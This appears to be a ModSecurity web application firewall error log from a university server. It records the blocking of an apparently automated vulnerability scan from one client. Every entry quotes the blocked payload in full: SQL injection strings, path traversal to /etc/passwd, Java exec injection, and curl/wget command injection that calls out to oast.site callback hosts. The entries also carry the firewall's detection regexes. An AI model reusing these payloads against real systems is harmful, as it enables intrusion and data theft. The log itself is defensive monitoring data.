[Tue Aug 29 11:30:52.381526 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPxBVcAAAAS"]
[Tue Aug 29 11:30:53.411511 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAOOuasAAAAW"]
[Tue Aug 29 11:30:53.498387 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/account"] [unique_id "ZO10fcCo-f0AAAPpWf4AAAAI"]
[Tue Aug 29 11:30:54.319611 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAOM4akAAAAU"]
[Tue Aug 29 11:30:54.465170 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10fsCo-f0AAAPMmEYAAAAY"]
[Tue Aug 29 11:30:54.517439 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAOKNsYAAAAK"]
[Tue Aug 29 11:30:55.404041 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10f8Co-f0AAAPPSzUAAAAd"]
[Tue Aug 29 11:30:56.315547 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAOKNssAAAAK"]
[Tue Aug 29 11:30:56.349277 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAO87@wAAAAF"]
[Tue Aug 29 11:30:58.505966 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAPxBWwAAAAS"]
[Tue Aug 29 11:30:58.515068 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPMmFsAAAAY"]
[Tue Aug 29 11:30:59.418587 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlg55edtgwa4zsqa.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAPLwC0AAAAX"]
[Tue Aug 29 11:30:59.427031 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPRNe8AAAAf"]
[Tue Aug 29 11:31:01.868874 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAPMmGUAAAAY"]
[Tue Aug 29 11:31:03.516698 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlg5z7hk5sf93ogt.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP5mGgAAAAM"]
[Tue Aug 29 11:31:04.683289 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgnu8ep43oykyhc.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgnu8ep43oykyhc.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXcAAAAR"]
[Tue Aug 29 11:31:04.723625 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgip4t8op4jbibt.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP@MvcAAAAZ"]
[Tue Aug 29 11:31:04.999450 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAP9HfoAAAAW"]
[Tue Aug 29 11:31:05.729896 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "digilibfeb.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQDFRMAAAAl"]
[Tue Aug 29 11:31:06.317443 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQIS6oAAAAq"]
[Tue Aug 29 11:31:06.363874 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQR42wAAAAz"]
[Tue Aug 29 11:31:07.313897 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgm46gfqd4bediq.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAP9HgUAAAAW"]
[Tue Aug 29 11:31:08.312513 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAP4H@sAAAAI"]
[Tue Aug 29 11:31:09.088239 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg9ihsqusg8r1m6.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQTKFkAAAA1"]
[Tue Aug 29 11:31:10.337746 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQA-7MAAAAi"]
[Tue Aug 29 11:31:10.359380 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAQFcP4AAAAn"]
[Tue Aug 29 11:31:10.361673 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlggogd734cihh87.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQR43MAAAAz"]
[Tue Aug 29 11:31:11.300137 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAPMmGsAAAAY"]
[Tue Aug 29 11:31:12.004787 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg359k6tjqgzkdo.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAQCvz4AAAAk"]
[Tue Aug 29 11:31:13.308575 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQQyi8AAAAy"]
